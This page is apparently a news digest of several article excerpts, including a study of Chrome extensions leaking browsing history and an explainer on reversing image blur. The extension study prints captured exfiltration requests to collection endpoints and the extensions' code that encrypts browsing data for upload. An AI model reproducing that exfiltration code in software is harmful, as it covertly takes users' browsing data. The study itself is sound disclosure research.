10 interesting stories served every morning and every evening.
...
Read the original on www.cve.org »
Version 2.1.20 of Claude Code shipped a change that replaced every file read and every search pattern with a single, useless summary line.
Where you used to see:
You now get:
“Searched for 1 pattern.” What pattern? Who cares.
You’re paying $200 a month for a tool that now hides what it’s doing with your codebase by default.
Across multiple GitHub issues opened for this, all comments are pretty much saying the same thing: give us back the file paths, or at minimum, give us a toggle.
For the majority of users, this change is a nice simplification that reduces noise.
What majority? The change just shipped and the only response it got is people complaining.
Then when pressed, the fix offered wasn’t to revert or add a toggle. It was: “just use verbose mode.”
A big ’ole dump of thinking traces, hook output, full subagent transcripts, and entire file contents into your terminal. People explained, repeatedly, that they wanted one specific thing: file paths and search patterns inline. Not a firehose of debug output.
The developer’s response to that?
I want to hear folks’ feedback on what’s missing from verbose mode to make it the right approach for your use case.
Read that again. Thirty people say “revert the change or give us a toggle.” The answer is “let me make verbose mode work for you instead.”
As one commenter put it:
If you are going to display something like ‘Searched for 13 patterns, read 2 files’ there is nothing I can do with that information. You might as well not display it at all.
Several versions later, the “fix” is to keep making verbose mode less and less verbose by removing thinking traces and hook output so it becomes a tolerable way to get your file paths back. But verbose mode still dumps full sub-agent output onto your screen, among other things.
Before, when Claude spawned multiple sub-agents you’d see a compact line-by-line stream of what each one was doing, just enough to glance at. Now you get walls of text from multiple agents at once. So what’s the plan? Keep stripping things out of verbose mode one by one until it’s no longer verbose? Where does it end? At some point you’ve just reinvented a config toggle with extra steps.
And the people who were using verbose mode for thinking and hooks now need to press Ctrl+O to get what they had by default. So instead of fixing one problem, you created two.
People are pinning themselves to version 2.1.19 and in the meantime the fix everyone is asking for, a single boolean config flag, would take less effort to implement than all the verbose mode surgery that’s been done instead.
Anthropic during the Super Bowl: we’d never disrespect our users.
Anthropic on GitHub: have you tried verbose mode?
...
Read the original on symmetrybreak.ing »
We built an automated scanning pipeline that runs Chrome inside a Docker container, routes all traffic through a man‑in‑the‑middle (MITM) proxy, and watches for outbound requests that correlate with the length of the URLs we feed it. Using a leakage metric we flagged 287 Chrome extensions that exfiltrate browsing history.Those extensions collectively have ~37.4 M installations — roughly 1 % of the global Chrome user base.The actors behind the leaks span the spectrum: Similarweb, Curly Doggo, Offidocs, chinese actors, many smaller obscure data‑brokers, and a mysterious “Big Star Labs” that appears to be an extended arm of Similarweb.The problem isn’t new. In 2017, M. Weissbacher et al. research on malicious browser extensions. In 2018, R. Heaton showed that the popular “Stylish” theme manager was silently sending browsing URLs to a remote server. Those past reports cought our eye and motivated us to dig into this issue.Fast forward to 2025: Chome Store now hosts roughly 240 k extensions, many of them with hundreds of thousands of users. We knew that we needed a scalable, repeatable method to measure whether an extension was actually leaking data in the wild.It was shown in the past that chrome extensions are used to exfiltrate user browser history that is then collected by data brokers such as Similarweb and Alexa. We try to prove in this report that Similarweb is very much still active and collects data.Why does it matter? There is a moral aspect to the whole issue. Imagine that you build your business model on data exfiltration via innocent looking extensions and using that data to sell them to big corporates. Well, that’s how Similarweb is getting part of the data. That should remind us that whatever software you are using for free and it is not open sourced, you should assume you are the product. The second aspect is that it puts the users into danger and potentially this could be used for corporate exfiltration. Even if only browsed URLs are exfiltrated, they typically contain personal identifications, that way bad actors that would pay for the raw collected traffic can try to target individuals.We considered sharing the details of the setup, but we considered this will only enable attackers to adapt quicker to this method. For this reason we will not share the code nor the exact details of the setup.We developed our internal research framework that was inspired by M. Weissbacher et al. work:Synthetic browsing workloads (increasing consistent payload send to google.com, this request never left docker container).Simple regression model to see if there is corelation between outbound traffic volume and the length of the URLs we request.The idea was simple: if an extension is just reading the page title or injecting CSS, its network footprint should stay flat regardless of how long the URL we visit is. If the outbound traffic grows linearly with the URL length, we have a high probability that the extension is shipping the URL itself (or the entire HTTP request) to a remote server.mitmdump writes every request/response to a JSON file. After the run we parse the file and compute for each destination domain + endpoint:The leakage ratio is defined as:If R ≥ 1.0 we consider the endpoint definitely leaking (the payload size is at least as big as the URL). If 0.1 ≤ R < 1.0 we flag it as probable leakage and send it for manual review. We scanned the leakage in two stages first only 4 different payload sizes and if the condition 0.1 ≤ R < 1.0 was fullfilled we continued with additional differen 6 payload sizes. Considering o naverage 10 minute scan it took us 930 CPU days to perform the scan. For scans that would take 1 day per extension, different strategy would need to be considered. Perhaps only the extensions with higher user counts could be scanned for longer period of time.The exfiltrated data can be in some cases sold to data brokers such as Similarweb. Data brokers put together those data and can resell them further to consumers. M. Weissbacher et al. research showed that third parties are interested in scraping those data for unknown reasons, perhaps to monetize the information gathered. We set up our own honeypots and we supplied the extensions honey URLs.We should note that probably not all of the browser history leaking extensions have malicious intent. The following table provides list of leaking extensions that were tagged by the automated scan and aftewards the logs were manually inspected to remove false positives. Some of the extensions might be benign and may need collect browser history for functionallity such as “Avast Online Security & Privacy” for example.We performed OSINT on every flagged extension: examined the developer email, privacy policy URL, store description, and certificate information of the exfiltration domains and their website if provided. The result is a map of actors:We determined by using honeypot that Similarweb extensions Similar Sites is linked to Kontera scraper that is linked to Curly Doggo and Offidocs. Kontera scraper is linked to some extensions that we didn’t link to any particular Actor. We also believe Big Star Labs is actually Similarweb due to similarities that these extensions share with Similarweb’s extensions.There are only 38 countries with more citizens than Poland. Even if some of the extensions are not actively selling your data this matter is highly alarming.Credential Harvesting — Some extensions also request cookies; coupling that with history gives attackers a complete session picture.We inlcude a few examples of the leakage.This is the request made to the exfiltration endpoint, raw data are obfuscated on purpose.curl ’https://api2.poperblocker.com/view/update’ \
-H ‘Accept: */*’ \
-H ‘Accept-Language: en-GB,en-US;q=0.9,en;q=0.8’ \
-H ‘Connection: keep-alive’ \
-H ‘Content-Type: text/plain’ \
-H ‘Origin: chrome-extension://bkkbcggnhapdmkeljlodobbkopceiche’ \
-H ‘Sec-Fetch-Dest: empty’ \
-H ‘Sec-Fetch-Mode: cors’ \
-H ‘Sec-Fetch-Site: none’ \
-H ‘Sec-Fetch-Storage-Access: active’ \
-H ‘User-Agent: XXXXXX’ \
-H ’capr: www.google.com’ \
-H ‘kata: ajax’ \
-H ‘x-custom-keywords: %5B%5D’ \
-H ‘x-uuid: XXXXXX’ \
–data-raw $‘LQFQiQ9EEADTbpTauTauHHH…’
However, it wasn’t that difficult to decypher. Payload data are obfuscated with ROT47.{
“u”: “https://www.google.com/search?q=target”,
“kk”: “”,
“p”: “”,
“rd”: “”,
“bin”: XXXXXX,
“t”: “generated”,
“q1”: “from_add_bar”,
“to”: “texted”,
“tid”: XXXXXX,
“ch”: 2,
“us”: “XXXXXX”,
“h”: “XXXXXX”,
“ver”: 6,
“sver”: 1,
“dver”: 1,
“nid”: “7.9.4″,
“fiz”: “XXXXXX”
This is challenging case, we didn’t completely decrypt the payload, however, we have pretty good idea of what is going on.curl ’https://userstylesapi.com/top/styles’ \
-H ‘Accept: */*’ \
-H ‘Accept-Language: en-GB,en-US;q=0.9,en;q=0.8’ \
-H ‘Connection: keep-alive’ \
-H ‘Content-type: text/plain’ \
-H ‘Origin: chrome-extension://fjnbnpbmkenffdnngjfgmeleoegfcffe’ \
-H ‘Sec-Fetch-Dest: empty’ \
-H ‘Sec-Fetch-Mode: cors’ \
-H ‘Sec-Fetch-Site: none’ \
-H ‘Sec-Fetch-Storage-Access: active’ \
-H ‘User-Agent: XXXXXX’ \
-H ‘pthl: style’ \
-H ‘styl: news.ycombinator.com’ \
-H ‘x-session-init: s=a3e3e2a81&v=3.4.10&p=0’ \
–data-raw ‘PyDk…’
The raw data are not only obfuscated but encrypted. The script generates a random, one-time AES-256 key (symmetric key) inside the browser. It encrypts your data using that AES key. It takes that one-time AES key and encrypts it using a Public RSA Key hardcoded in the script. It bundles the encrypted key and the encrypted data together and sends them to the server. To decrypt the data, we need the AES key. To get the AES key, we need to decrypt the key blockand that is only possible with the RSA Private Key. With altering the code it would be possible to pause service worker and capture this AES generated key. We will leave this as fun exercise to the reader. The leakage for this endpoint is confirmed as the encrypted payload grows with longer browsed URL.For the record here is the code where the encrypton is done._ProductsContainer._createAnimation8 = {
init: function(e) {
const t = _ProductsContainer._createAnimation8,
n = e.instance,
a = {
s: “a3e3e2a81”,
sub: chrome.runtime.getManifest().version,
pid: n.removal
t.class = class {
assertScopeValues(e, t, n) {
const a = JSON.stringify(n),
s = btoa(a),
i = Math.random().toString(36).substring(2, 4).toUpperCase() + s,
r = {};
return r[e] = i,
r[t] = “9”,
r
async compilationGenerator() {
return self.crypto.subtle.generateKey({
name: “AES-GCM”,
length: 256
}, !0, [“encrypt”, “decrypt”])
mergeRuleConfigs(e, t) {
const n = btoa(String.fromCharCode.apply(null, new Uint8Array(e))),
a = btoa(String.fromCharCode.apply(null, new Uint8Array(t)));
return “”.concat(n, ”,“).concat(a)
async CmpNullValue(e, t, n) {
const a = JSON.stringify(n);
if (!this.recordsPath) {
const e = ‘{“key_ops”:[“encrypt”],“ext”:true,“kty”:“RSA”,“n”:“z7mcaorg4Lg3uiPzud1bwLvRvsWK9bpTTsy_DxIX8WRcDndqNQHTgG0HZUTxggp2cLBnxvjG0UPxhfIPZZRed82vLsFYVvdJOsz9iZoKXHqT67RhbI2XecvWKp_ciaw6wRQAycklmIQJaZp4QA-P2Ye19FtG03VaNJRBUCy2Th6huKozUsRErnW5LBW0X7C_sxxpgAE9ijBhxwawnsGal7dCHGwgxcUe9-rfbCD9e7PEJCL_IE9L-hYzjngr5_vXjUU0udjwXNp3YnyA279CMA5bqucp5eI-kXXjsPJRGYw1znhuIwSP2soqXyRT22inklJ4VtBp3rctC5J6ZLnM8Q”,“e”:“AQAB”,“alg”:“RSA-OAEP-256”}’,
t = JSON.parse(e);
this.recordsPath = await self.crypto.subtle.importKey(“jwk”, t, {
name: “RSA-OAEP”,
hash: “SHA-256”
}, !1, [“encrypt”])
const s = {};
if (a.length < 190) {
const t = await self.crypto.subtle.encrypt({
name: “RSA-OAEP”
}, this.recordsPath, (new TextEncoder).encode(a));
s[e] = btoa(String.fromCharCode.apply(null, new Uint8Array(t)))
} else {
const t = await this.compilationGenerator(),
n = self.crypto.getRandomValues(new Uint8Array(12)),
i = await self.crypto.subtle.encrypt({
name: “AES-GCM”,
iv: n
}, t, (new TextEncoder).encode(a)),
r = new Uint8Array(n.length + i.byteLength);
r.set(n),
r.set(new Uint8Array(i), n.length);
...
Read the original on qcontinuum.substack.com »
Fluorite is the first console-grade game engine fully integrated with Flutter.
Its reduced complexity by allowing you to write your game code directly in Dart, and using all of its great developer tools. By using a FluoriteView widget you can add multiple simultaneous views of your 3D scene, as well as share state between game Entities and UI widgets - the Flutter way!
At the heart of Fluorite lies a data-oriented ECS (Entity-Component-System) architecture. It’s written in C++ to allow for maximum performance and targeted optimizations, yielding great performance on lower-end/embedded hardware. At the same time, it allows you to write game code using familiar high-level game APIs in Dart, making most of your game development knowledge transferrable from other engines.
Your browser does not support the video tag.
This feature enables 3D Artists to define “clickable” zones directly in Blender, and to configure them to trigger specific events! Developers can then listen to onClick events with the specified tags to trigger all sorts of interactions! This simplifies the process of creating spatial 3D UI, enabling users to engage with objects and controls in a more intuitive way.
Your browser does not support the video tag.
Powered by Google’s Filament renderer, Fluorite leverages modern graphics APIs such as Vulkan to deliver stunning, hardware-accelerated visuals comparable to those found on gaming consoles. With support for physically-accurate lighting and assets, post-processing effects, and custom shaders, the developers can create visually rich and captivating environments.
Your browser does not support the video tag.
Thanks to its Flutter/Dart integration, Fluorite’s scenes are enabled for Hot Reload! This allows developers to update their scenes and see the changes within just a couple frames. This significantly speeds up the development process, enabling rapid iteration and testing of game mechanics, assets, and code.
...
Read the original on fluorite.game »
is a senior reviewer with over twenty years of experience. She covers smart home, IoT, and connected tech, and has written previously for Wirecutter, Wired, Dwell, BBC, and US News.
is a senior reviewer with over twenty years of experience. She covers smart home, IoT, and connected tech, and has written previously for Wirecutter, Wired, Dwell, BBC, and US News.
Posts from this author will be added to your daily email digest and your homepage feed.
People voiced concerns across social media that the AI-powered technology Ring uses to identify dogs could soon be used to search for humans. Combined with Ring’s recent rollout of its new facial recognition capability, it feels like a short leap for a pet-finding feature to be turned into a tool for state surveillance.
Ring spokesperson Emma Daniels told The Verge that Search Party is designed to match images of dogs and is “not capable of processing human biometrics.” Additionally, she maintains that the Familiar Faces facial recognition feature is separate from Search Party. It operates on the individual account level, she said, and there’s no communal sharing as there is with Search Party.
While Familiar Faces is opt-in for each user, Search Party is enabled by default on any outdoor camera enrolled in Ring’s subscription plan. It works by using AI to scan footage in the cloud for the missing dog once the owner uploads a picture to Ring’s Neighbors app. If a match is found, Ring alerts the camera’s owner, who can then choose to share the video or notify the owner through the app.
While that may be the case today, I asked whether Ring cameras could one day be used to specifically search for people. “The way these features are built, they are not capable of that today,” she said. “We don’t comment on feature road maps, but I have no knowledge or indication that we’re building features like that at this point.”
Ring users can currently share footage from their cameras with local law enforcement during an active investigation through a feature called Community Requests. Unlike previous Ring police partnerships, Community Request goes through third-party companies — the Taser company Axon and, soon, Flock. “The reason we did that is these third-party evidence management systems offer a much more secure chain of custody,” says Daniels. If a user declines a request, no one will be notified.
The company maintains that neither the government nor law enforcement can access its network, and that footage is shared only by users or in response to a legal request. Daniels reiterated what the company had previously told The Verge, that it has no partnerships with ICE or any other federal agency, and said you can see every request agencies have made on its Neighbors app profile.
Additionally, the Flock integration is not currently live, although Daniels had no update on the company’s plans for the partnership following the backlash. She referred me to an earlier response. “As we explore the integration, we will ensure the feature is built for the use of local public safety agencies only — which is what the program is designed for.”
The problem is that there’s nothing preventing local agencies from sharing footage with federal ones. And while the Super Bowl ad played up heartwarming images of a girl reunited with her puppy, the leap to this technology that can track people in your neighborhood is still very small. Combined with government overreach, it’s not hard to imagine how a powerful network of AI-enabled cameras goes from finding lost dogs to hunting people.
Siminoff said he came back because of the possibilities AI brings. With this technology, he believes neighborhood cameras could be used to virtually “zero out crime” within a year. Given these stated goals and the new capabilities AI can bring, why wouldn’t Ring be planning to add some form of Search Party for People to its cameras?
Eliminating crime is an admirable goal, but history has shown that tools capable of large-scale surveillance are rarely limited to their original purpose. Ring has a responsibility here to protect its users, which it says it is doing. But ultimately, it comes down to how much you can trust a company — and the company it keeps — to never overstep. If Ring is cloaking its ambitions behind our instinct to protect our furry friends, that trust will be hard to find.
...
Read the original on www.theverge.com »
If you follow information security discussions on the internet, you might have heard that blurring an image is not a good way of redacting its contents. This is supposedly because blurring algorithms are reversible.
But then, it’s not wrong to scratch your head. Blurring amounts to averaging the underlying pixel values. If you average two numbers, there’s no way of knowing if you’ve started with 1 + 5 or 3 + 3. In both cases, the arithmetic mean is the same and the original information appears to be lost. So, is the advice wrong?
Well, yes and no! There are ways to achieve non-reversible blurring using deterministic algorithms. That said, in other cases, blur filters can preserve far more information than would appear to the naked eye — and do so in a pretty unexpected way. In today’s article, we’ll build a rudimentary blur algorithm and then pick it apart.
If blurring is the same as averaging, then the simplest algorithm we can choose is the moving mean. We take a fixed-size window and replace each pixel value with the arithmetic mean of n pixels in its neighborhood. For n = 5, the process is shown below:
Note that for the first two cells, we don’t have enough pixels in the input buffer. We can use fixed padding, “borrow” some available pixels from outside the selection area, or simply average fewer values near the boundary. Either way, the analysis doesn’t change much.
Let’s assume that we’ve completed the blurring process and no longer have the original pixel values. Can the underlying image be reconstructed? Yes, and it’s simpler than one might expect. We don’t need big words like “deconvolution”, “point spread function”, “kernel”, or any scary-looking math.
We start at the left boundary (x = 0). Recall that we calculated the first blurred pixel like by averaging the following pixels in the original image:
Next, let’s have a look at the blurred pixel at x = 1. Its value is the average of:
We can easily turn these averages into sums by multiplying both sides by the number of averaged elements (5):
Note that the underlined terms repeat in both expressions; this means that if we subtract the expressions from each other, we end up with just:
The value of img(-2) is known to us: it’s one of the fixed padding pixels used by the algorithm. Let’s shorten it to c. We also know the values of blur(0) and blur(1): these are the blurred pixels that can be found in the output image. This means that we can rearrange the equation to recover the original input pixel corresponding to img(3):
We can also apply the same reasoning to the next pixel:
At this point, we seemingly hit a wall with our five-pixel average, but the knowledge of img(3) allows us to repeat the same analysis for the blur(5) / blur(6) pair a bit further down the line:
This nets us another original pixel value, img(8). From the earlier step, we also know the value of img(4), so we can find img(9) in a similar way. This process can continue to successively reconstruct additional pixels, although we end up with some gaps. For example, following the calculations outlined above, we still don’t know the value of img(0) or img(1).
These gaps can be resolved with a second pass that moves in the opposite direction in the image buffer. That said, instead of going down that path, we can also make the math a bit more orderly with a good-faith tweak to the averaging algorithm.
The modification that will make our life easier is to shift the averaging window so that one of its ends is aligned with where the computed value will be stored:
In this model, the first output value is an average of four fixed padding pixels (c) and one original image pixel; it follows that in the n = 5 scenario, the underlying pixel value can be computed as:
If we know img(0), we now have all but one of the values that make up blur(1), so we can find img(1):
The process can be continued iteratively, reconstructing the entire image — this time, without any discontinuities and without the need for a second pass.
In the illustration below, the left panel shows a detail of The Birth of Venus by Sandro Botticelli; the right panel is the same image ran through the right-aligned moving average blur algorithm with a 151-pixel averaging window that moves only in the x direction:
Now, let’s take the blurry image and attempt the reconstruction method outlined above — computer, ENHANCE!
This is rather impressive. The image is noisier than before as a consequence of 8-bit quantization of the averaged values in the intermediate blurred image. Nevertheless, even with a large averaging window, fine detail — including individual strands of hair — could be recovered and is easy to discern.
The problem with our blur algorithm is that it averages pixel values only in the x axis; this gives the appearance of motion blur or camera shake.
The approach we’ve developed can be extended to a 2D filter with a square-shaped or a cross-shaped averaging window. That said, a more expedient hack is to apply the existing 1D filter in the x axis and then follow with a complementary pass in the y axis. To undo the blur, we’d then perform two recovery passes in the inverse order.
Unfortunately, whether we take the 1D + 1D or the true 2D route, we’ll discover that the combined amount of averaging per pixel causes the underlying values to be quantized so severely that the reconstructed image is overwhelmed by noise unless the blur window is relatively small:
That said, if we wanted to develop an adversarial blur filter, we could fix the problem by weighting the original pixel a bit more heavily in the calculated mean. For the x-then-y variant, if the averaging window has a size W and the current-pixel bias factor is B, we can write the following formula:
This filter still does what it’s supposed to do; here’s the output of an x-then-y blur for W = 200 and B = 30:
As a proof of concept for skeptics, we can also make an adversarial filter that operates in two dimensions simultaneously. The following is a reconstruction after a 2D filter with a simple cross-shaped window:
Remarkably, the information “hidden” in the blurred images survives being saved in a lossy image format. The top row shows images reconstituted from an intermediate image saved as a JPEG at 95%, 85%, and 75% quality settings:
The bottom row shows less reasonable quality settings of 50% and below; at that point, the reconstructed image begins to resemble abstract art.
For more weird algorithms, click here or here. Thematic catalog of posts on this site can be found on this page.
...
Read the original on lcamtuf.substack.com »
Add AP News as your preferred source to see more of our stories on Google.
Add AP News as your preferred source to see more of our stories on Google.
EL PASO, Texas (AP) — The sudden and surprising airspace closure over El Paso, Texas, on Wednesday — first announced as extending for 10 days but lasting only a few hours — stemmed from the Pentagon’s plans to test a laser to shoot down drones used by Mexican drug cartels, according to three people familiar with the situation who spoke on condition of anonymity to share sensitive details.
That caused friction with the Federal Aviation Administration, which wanted to ensure commercial air safety, and the two agencies sought to coordinate, according to two of the people.
Despite a meeting scheduled for later this month to discuss the issue, the Pentagon wanted to go ahead and test the laser, prompting the FAA to shutter the airspace over the city on the U. S.-Mexico border. The laser was used at some point, one of the people said.
Transportation Secretary Sean Duffy said earlier that the airspace closed as the Defense Department and the FAA halted an incursion by Mexican cartel drones and “the threat has been neutralized.” Drone incursions are not uncommon along the U. S.-Mexico border.
The restrictions were only in place for a couple of hours in the city of nearly 700,000 people, but it is unusual for an entire airport to shut down even for a short time. Stranded travelers with luggage lined up at airline ticket counters and car rental desks before the order was lifted.
Normal flights resumed in the morning after seven arrivals and seven departures were canceled. Some medical evacuation flights also had to be rerouted.
Jorge Rueda, 20, and Yamilexi Meza, 21, of Las Cruces, New Mexico, had their morning flight to Portland, Oregon, canceled, so they were losing part of their Valentine’s Day weekend trip.
Rueda said he was glad that “10 days turned into two hours.” They were booked on an evening flight out of El Paso.
The investigation into last year’s midair collision near Washington, D. C., between an airliner and Army helicopter that killed 67 people highlighted how the FAA and Pentagon were not always working well together.
The National Transportation Safety Board said the FAA and the Army did not share safety data with each other about the alarming number of close calls around Reagan National Airport and failed to address the risks.
Democratic Sen. Tammy Duckworth of Illinois, a former Army helicopter pilot who serves on committees focused on aviation and the armed services, said the issue Wednesday was the latest example of “the lack of coordination that’s endemic in this Trump administration.”
Rep. Veronica Escobar, a Democrat whose district includes El Paso, said neither her office nor local officials received any advance notice of the closure. After it was lifted, she said “the information coming from the federal government does not add up.”
“I believe the FAA owes the community and the country an explanation as to why this happened so suddenly and abruptly and was lifted so suddenly and abruptly,” Escobar said at a news conference.
Officials at the White House, FAA and Department of Transportation did not immediately respond to requests for comment about the dispute. The Pentagon said it had nothing to add to its statement that largely mirrored Duffy’s comment.
Republican Rep. Tony Gonzales, whose congressional district covers an area that stretches about 800 miles (1,300 kilometers) along Texas’ border with Mexico, said cartel drone sightings are common.
“For any of us who live and work along the border, daily drone incursions by criminal organizations is everyday life for us. It’s a Wednesday for us,” Gonzales said.
Steven Willoughby, deputy director of the counter-drone program at the Department of Homeland Security, told Congress in July that cartels are using drones nearly every day to transport drugs across the border and surveil Border Patrol agents. More than 27,000 drones were detected within 500 meters (1,600 feet) of the southern border in the last six months of 2024, he said, mostly at night.
What is “extremely rare” is the closure of an entire airport over a security issue, according to a former chief security officer at United Airlines.
Officials usually will try to take security measures to isolate the risk if a specific plane or airline is threatened rather than shut down the airport, said Rich Davis, now a senior security adviser at risk mitigation company International SOS.
Asked about the drone explanation provided by U. S. officials, Mexican President Claudia Sheinbaum said she had “no information about the use of drones on the border.” She noted that if U.S. authorities have more information, they should contact Mexico’s government.
Mexican defense and navy secretaries planned to talk with officials from U. S. Northern Command in a meeting Wednesday in Washington attended by several other countries, Sheinbaum told reporters. Sheinbaum said the Mexican officials would “listen” in the meeting and her government would look into “the exact causes” of the closure.
El Paso is a hub of cross-border commerce alongside Ciudad Juárez. That Mexican city is home to about 1.5 million people, and some of its residents are accustomed to taking advantage of facilities, including airports, on the U. S. side of the border.
That easy access to the United States also has made Juarez, like other border cities, attractive to Mexico’s drug cartels seeking to safeguard their smuggling routes for drugs and migrants headed north and cash and guns moving to the south.
El Paso Mayor Renard Johnson told reporters that he did not hear about the closure until after the alert was issued.
“Decisions made without notice and coordination puts lives at risk and creates unnecessary danger and confusion,” Johnson said. “This was a major and unnecessary disruption, one that has not occurred since 9/11.”
The airport describes itself as the gateway to west Texas, southern New Mexico and northern Mexico. Southwest, United, American and Delta are among the carriers that operate flights there.
A similar 10-day temporary flight restriction for special security reasons remained in place Wednesday around Santa Teresa, New Mexico, which is about 15 miles (24 kilometers) northwest of the El Paso airport. FAA officials did not immediately explain why that restriction remained.
Sen. Ben Ray Lujan, a New Mexico Democrat, said in a statement that he was seeking answers from the FAA and the Trump administration “about why the airspace was closed in the first place without notifying appropriate officials, leaving travelers to deal with unnecessary chaos.”
Travel plans on both sides of the border were disrupted.
María Aracelia was pushing two roller suitcases across the pedestrian bridge from Ciudad Juarez to El Paso on Wednesday morning. She had a round-trip flight to Illinois scheduled for the afternoon.
After receiving a text at 4 a.m. telling her about the 10-day closure, she scrambled to try to find other options, even how to get to another airport. Then came a notification that the El Paso airport had reopened.
“This is stressful, and there isn’t time to make so many changes, especially if you need to get back for work,” Aracelia said.
Kim, Finley and Jalonick reported from Washington, and Funk from Omaha, Nebraska. Associated Press writers Jim Vertuno in Austin, Texas; Darlene Superville, Mike Balsamo and Konstantin Toropin in Washington; Kathy McCormack in Concord, New Hampshire; María Verza in Mexico City; and Christian Torres Chávez in Ciudad Juarez, Mexico, contributed to this report.
...
Read the original on apnews.com »
If there’s one single consistent advantage the United States has carried since its founding, it is its ability to draw talent and expand its population. Now, as the country prepares to celebrate its 250th birthday and ponders its appetite for President Donald Trump’s crackdown on immigration, the US risks recording a historic and economic milestone decades ahead of schedule: Based on at least one respected estimate, 2026 may see the first real population decline in American history.
Even if that milestone doesn’t happen this year, there’s broad agreement among experts on both sides of the immigration debate that Trump’s second term is hastening a critical point — when net migration into the US stops offsetting the declining births and rising deaths that come with an aging native-born population. The more Trump cracks down on immigration, the sooner the US population plateaus or even shrinks.
A country’s population is an essential element of its economic mass. The shrinking population of China, which in 2025 recorded its lowest birth rate since Communist rule began in 1949, is one good reason it may never overtake the US as the world’s largest economy. Japan’s population peaked at 128 million in 2010, and its decline has dragged on growth for years. Europe’s worsening demographics have long fed its narrative of economic malaise.
The US has for years mostly stood apart from that conversation. In 2023, when the US Census last issued long-run forecasts for the population, the main prediction was that it would decline for the first time in 2081. But the way things are going, this year the US is at best poised to record a lower population growth rate than Germany, where an aging population has contributed to its reputation as the “sick man of Europe.”
To be clear, that’s not necessarily a problem for Trump. His administration is focused on delivering on his promise to reduce the immigrant population and argues, despite the protestations of economists, that doing so will mean greater opportunities and wages for native-born workers and will reduce the cost of everything from housing to health care by reducing demand.
...
Read the original on www.bloomberg.com »
1. In the first really heavy winter storm of the year, your power might go off. This is understandable but you do have to think about it beforehand.
2. If the power’s been off for a while, like, over 24 hours, and then suddenly it comes back on for a few minutes, and then it immediately goes out again — you might understandably believe that that means that the power company is about to restore your electricity, and there was a hiccup but it’s about to come back on for real. Unfortunately, nothing in this life is knowable.
3. The instruction manuals for things — cars, snowblowers, wood stoves, etc — often have useful information about using the thing. A surprising number of my peers don’t realize this.
4. You have a lot of batteries, flashlights, shelf stable food, warm clothes, and drinking water stored, right? Good.
5. Snow is easiest to shovel when it’s just fallen. The more time passes, the more freeze-thaw cycles — even gentle ones — build up and make the fallen snow denser and tougher. (This might be less true in very cold places where it never gets above freezing during the day? I don’t know, honestly.)
6. Snow is heavier than you think.
You might think physical strength is useful for lots of things, like overall health or familiar household tasks or picking up dudes (literally or metaphorically.) But actually, the main thing physical strength is useful for is letting you shovel more snow.
Push comes to shove, you can probably substitute grit for physical strength. But I suspect that muscle is easier to build than grit, for most people, not to mention less injurious.
Anyway, digging snow is hard. And snow is the easiest thing you can dig. How do hobby tunnelers do it??
7. Have neighbors up the street with a snowplow. They will save your skin.
8. Speaking of snow being heavy, my Alaskan friend tells me that at some degree of snowfall, you will also want to clear snow off of your roof so that it doesn’t break your whole house. I didn’t know that. Thankfully, my roof survived (for now). There are various tools made for this, one of which is called an avalanche and looks really fun.
9. Even if your house technically runs on propane, and you have propane, electricity might still run the propane, so your house is going to get cold. Unless you run the woodstove. Which you will.
If you’re short on kindling, sufficient cardboard CAN be used to light a big log on fire.
10. You should own rainpaints. (Or snowpants. Some kind of waterproof outer layer for your legs.)
11. If it’s too late for that, keep one pair of pants to put on when you go out into the snow for quick trips — and then immediately change into a different pair when you get back inside. This is important for staying dry.
12. Do NOT get wet and cold.
13. You already own gaiters, right? Of course you do. Gaiters are the pinnacle of fashion. Nobody realizes this, but you know that these slick garments can be made in a variety of styles, highlight the calf, and visually break up the block of the leg, adding new intrigue and aesthetic possibilities to the modern conception of dress. You are nobody’s fool, and naturally, you already own a pair of outdoors gaiters.
The situation you find yourself in now is one of the many cases where gaiters are also practical — put them on, go tromp around outside, and suddenly less snow winds up packed in your boot. It’s not a slam-dunk, because when the snow is four feet high it will also top the gaiters — what you really want is rain pants. But it’s still better than not having them, and you’ll feel real good about yourself and your practical, correct clothing takes. Good on you!
14. If possible, live in a house that a Burning Man camp runs out of in the summer. This means that even if the house is otherwise pretty well-stocked for winter storms, you will keep finding manifold useful things along the way that someone stashed in some moment of hurried summer madness, which will now make your time more pleasant — like battery powered string lights, or better shelf-stable food, or hard liquor.
In fact, in the hour of your despair (when you’re out of firewood next to the house, and the rest of the firewood is some 30 feet away but now buried under four feet of snow because you forgot to fix the roof on the woodshed during summer — and see Point 6, “Snow is heavier than you think” — and you’d have to dig your way over there and dig the wood out and then dry it, and you don’t want to do any of that) you will remember that over the summer, someone inexplicably left a garbage can full of firewood next to the truck, sealed under a plastic bag lid, and that’s only 20 feet away AND it’s already dry. You have no idea why that ended up there but in this moment it will give you strength. You can tromp over there and use a plastic child’s sled from the garage to drag wood back to the porch, and thus you will be warm another couple of nights.
15. You certainly already know: Absolutely do not run a generator inside, or “kind of inside” (open garage, etc), under any structures that contain live people or animals that you care about. This little box loves to make electricity and sparks and carbon monoxide. You must respect it.
16. In fact, any generators you may have around would look just darling in a little structure raised off the ground, with a covered roof, some 20 feet at minimum away from an occupied structure, wouldn’t they?
17. Any generators you might have around should also be checked in the fall to make sure they work, and put away at the end of winter winterized as per the manual instructions. You did that, right? Right? Uh oh.
18. Your house’s well is, of course, also electricity-powered. This adds another layer of complication. You did bleach ten gallons of well water for long-term storage already earlier in the year, right? Good.
Anyway, to flush a toilet without a running tank, dump about a gallon of water right into the bowl as fast as possible. (If you do it slowly, it won’t overfill, but it won’t ‘flush’ all at once either.)
19. Even if you didn’t have plenty of drinking water stored up, you wouldn’t be in trouble, because you can fill a big cooking pot with snow and put it on top of the wood stove. But you do have a lot of bottled water. Good on you.
20. You might think, at least finally I’ll have time to read one of my many unread books or do one of several arts or crafts I have around. And you will, a little. But it will bring you no joy. You will wish you were playing Animal Crossing.
21. One of the books you’ll read is Shadows on the Koyukuk, a memoir by the son of a fur trapper & a Koyukuk Athabascan native, on his life growing up and living in Alaska in the early 1900s. It’s a great book in any circumstance. But certain parallels will occur to you now, especially. You must thicken your skin to appreciate them. For instance, author Sidney Huntington will recount how he got lost in the woods at night with damp clothes, while it was well under -30° Fahrenheit out, carrying only an axe — so he remembered some advice he’d gotten once, and chopped down some trees, and started two fires to keep him warm and let him sleep through the night until it was daylight and he could find his way home.
Not only is it about 60° warmer where you are, you’ve never even cut down ONE tree with an axe. (Or built a boat, or killed a grizzly bear, or…)
But you must remind yourself that despite your shortcomings, you almost certainly know about more kinds of fish than Huntington did at your age, so modernity has not failed you utterly. And you don’t know anyone who’s ever died from tuberculosis or starvation, which is cool too.
